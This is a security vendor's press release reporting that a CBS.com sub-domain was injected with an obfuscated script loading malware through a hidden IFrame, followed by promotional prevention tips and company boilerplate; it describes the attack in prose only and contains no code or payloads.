Finjan Warns Users Over CBS Portal Being Compromised by Cybercriminals
"The cybercriminals, who compromised one of the sub-domains under CBS.com, appear to have added a malicious obfuscated script to the infected page. The injected script then dynamically injects an IFrame that pulls malware from a remote server locating in Russia." said Yuval Ben-Itzhak, Finjan's CTO.
Fortunately for CBS site visitors, Finjan reports actions were already taken to turn that Russian server offline.
Finjan CTO says the company's MCRC - Malicious Code Research Center - has notified CBS of the problem and the team expects the page in question to be taken offline and/or replaced with the original data.
"This saga confirms our many previous warnings that obfuscated code posing a serious threat to Internet users' PCs. Our Threats Reports have continued to identify the increasing use of code obfuscation as a means of bypassing traditional signature-based solutions in order to propagate malware," he said.
"This saga illustrates the popularity of malicious obfuscated code as a weapon of choice by criminal hackers. It also highlights the fact that no Web portal, no matter how high ranking, can be totally secure against a system hack and consequent infection of its visitors. Web users need to exercise caution at all times," he added.
Finjan's security tips and notes to prevent infection:
1. Install a Secure Web Gateway to protect valuable data from being compromised by malware
2. Finjan is offering free Malware Detection Audits to organisations with over 1,000 users
3. Consider the use of a secure platform when accessing Web 2.0 sites
1. Use Finjan's SecureBrowsing browser plug-in to make the right decisions when browsing the Web (see http://securebrowsing.finjan.com )
2. Exercise caution when accessing Web 2.0-enabled sites - e.g. Social Networking portals, wikis and blogs etc.,
3. Do not rely just on signature-based IT security applications
For all users:
1. The preferred way to stop dynamically obfuscated code and similar types of advanced hacking techniques is to analyse and understand the code embedded within Web content on-the-fly before it reaches the user.
2. Proactive, behaviour-based IT security technology performs in-depth analysis of each and every piece of content, regardless of its original source.
3. This analysis breaks the code into parts, understands the execution path and the functions' call flow.
4. As a result, these solutions can identify code that is about to perform a malicious or suspicious operation, and block it at the perimeter, rather than allowing it to enter the network and relying on desktop security.
5. This type of proactive security is akin to having an 'expert system' in a box,' safeguarding users from even the most devious attack techniques, such as those disclosed in this and previous Finjan reports.
For more on the CBS site infection: http://www.finjan.com/MCRCblog.aspx?EntryId=2103
For more on Finjan: http://www.finjan.com
Malicious Code Research Center (MCRC) is the leading research department at Finjan, dedicated to the research and detection of security vulnerabilities in Internet applications, as well as other popular programs. MCRC's goal is to stay steps ahead of hackers attempting to exploit open platforms and technologies to develop malicious code such as Spyware, Trojans, Phishing attacks, worms and viruses. MCRC shares its research efforts with many of the world's leading software vendors to help patch their security holes. MCRC is a driving force behind the development of next generation security technologies used in Finjan's proactive web security solutions. For more information, visit our MCRC subsite.
Finjan Software GmbH
Finjan is a global provider of web security solutions for the enterprise market. Our real-time, appliance-based web security solutions deliver the most effective shield against web-borne threats, freeing enterprises to harness the web for maximum commercial results. Finjan's active real-time web security solutions utilize patented behaviour-based technology to repel all types of threats arriving via the web, such as spyware, phishing, Trojans and obfuscated malicious code, securing businesses against unknown and emerging threats, as well as known malware. Finjan's security solutions have received industry awards and recognition from leading analyst houses and publications, including Gartner, IDC, Butler Group, SC Magazine, CRN, ITPro, PCPro, ITWeek, Network Computing, and Information Security. With Finjan's award-winning and widely used solutions, businesses can focus on implementing web strategies to realize their full organizational and commercial potential. For more information about Finjan, please visit: www.finjan.com.